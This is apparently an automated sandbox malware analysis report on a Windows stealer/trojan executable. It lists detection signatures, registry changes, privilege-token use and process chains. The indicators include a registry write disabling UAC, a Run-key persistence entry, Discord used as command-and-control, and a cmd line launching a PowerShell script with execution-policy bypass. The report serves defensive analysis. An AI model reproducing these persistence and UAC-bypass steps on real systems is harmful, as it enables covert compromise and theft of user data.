Malware Analysis Report

2025-06-16 06:53

Sample ID 241104-c9yg9s1je1
Target b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe
SHA256 b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2
Tags
discovery evasion execution persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2

Threat Level: Known bad

The file b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe was found to be: Known bad.

Malicious Activity Summary

discovery evasion execution persistence spyware stealer trojan

UAC bypass

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Reads user/profile data of web browsers

Checks computer location settings

Loads dropped DLL

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Blocklisted process makes network request

Checks installed software on the system

Adds Run key to start application

An obfuscated cmd.exe command-line is typically used to evade detection.

Drops file in System32 directory

Enumerates processes with tasklist

Drops file in Windows directory

System Location Discovery: System Language Discovery

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-04 02:47

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-04 02:47

Reported

2024-11-04 02:50

Platform

win10v2004-20241007-en

Max time kernel

135s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2 = "C:\\ProgramData\\Update.vbs" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} = "\"C:\\Users\\Admin\\AppData\\Local\\Package Cache\\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\\python-3.12.6-amd64.exe\" /burn.runonce" C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\NauSjxiGnW.txt C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe N/A
File opened for modification C:\Windows\System32\NauSjxiGnW.txt C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE157.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57de3f.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57de3a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{901B913C-FA63-48D2-9842-7D7676739378} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57de3e.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57de3f.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{537B2AF5-504B-4303-99CB-FDE56F47AA51} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE466.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57de3a.msi C:\Windows\system32\msiexec.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\python-installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12\Version = "3.12.6150.0" C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\ = "{901B913C-FA63-48D2-9842-7D7676739378}" C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Version = "3.12.6150.0" C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\DisplayName = "Python 3.12.6 Executables (64-bit)" C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\ = "{537B2AF5-504B-4303-99CB-FDE56F47AA51}" C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\Version = "3.12.6150.0" C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12 C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12\ = "{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}" C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\DisplayName = "Python 3.12.6 Core Interpreter (64-bit)" C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12\DisplayName = "Python 3.12.6 (64-bit)" C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378} C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51} C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1820 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 1684 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 212 wrote to memory of 1684 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1684 wrote to memory of 2412 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1684 wrote to memory of 2412 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2412 wrote to memory of 3940 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2412 wrote to memory of 3940 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1820 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 4536 wrote to memory of 3928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4536 wrote to memory of 3928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1820 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 2032 wrote to memory of 4240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2032 wrote to memory of 4240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3168 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3168 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1820 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 4980 wrote to memory of 1580 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4980 wrote to memory of 1580 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1820 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1544 wrote to memory of 4044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1544 wrote to memory of 4044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1820 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 2268 wrote to memory of 3456 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2268 wrote to memory of 3456 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4960 wrote to memory of 2004 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4960 wrote to memory of 2004 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2620 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2620 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1820 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 4956 wrote to memory of 2708 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4956 wrote to memory of 2708 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1820 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 2684 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2684 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1820 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 916 wrote to memory of 1860 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 916 wrote to memory of 1860 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1820 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1684 wrote to memory of 3876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1684 wrote to memory of 3876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1820 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 4564 wrote to memory of 516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4564 wrote to memory of 516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1820 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe

"C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\ChedmB0hfd.ps1""

